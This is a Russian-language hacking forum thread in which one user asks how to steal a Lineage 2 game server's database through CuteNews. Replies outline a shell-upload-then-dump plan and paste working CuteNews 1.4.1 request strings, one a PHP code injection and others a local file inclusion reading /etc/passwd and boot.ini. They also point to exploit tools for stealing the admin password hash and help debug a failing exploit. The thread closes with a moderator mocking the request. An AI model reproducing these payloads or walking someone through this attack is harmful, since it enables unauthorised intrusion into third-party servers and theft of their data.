Стянуть базу через CuteNews
 

Пипл плс не удаляйте тему, ищу поиском нечё толкового ненаходит :(

Как можно через CuteNews угнать базу (допустим сервака ла2) помогите плс... Заранее спс!

Заливаешь шелл, смотришь конфиги -> коннектишся к серверу l2 -> сливаешь данные...

CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22te st%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00
Попробуй мож получиться

Короче там уязвимость через moy-web и Cute News 1.4.1
Получаеш доступ к базе...

Уязвимость по которой можно получить доступ к главной страничке кто знает что это такое
админка там в _http://sayt-l2-moyweb/news/
Эксплойты на узнавание ника и хеша пароля
_http://www.waraxe.us/tools/
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей получить MD5 хэш администратора, с использованием $_COOKIE. Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.

Хммм...указал я путь до search.php
А какой ник вводить в эксплойте?

И когда запускаю эксплойт то он мне пишет:

А собственно зачем тебе вообще это всё нужно, если ты даже не знаешь что делает эксплойт который ты юзаешь? Помоему оно тебе просто не нужно.

Он тебе пишет что функция не инициализирована.
Это наверное потому что ты не поставил бибилиотеку с Курлом - поставь бибилотеку - будет работать.

P.S. закрыто.
P.P.S. вообще классная тема, звучит как "плиз, сломайте за меня, а то я ничего не умею делать, но очень хочется".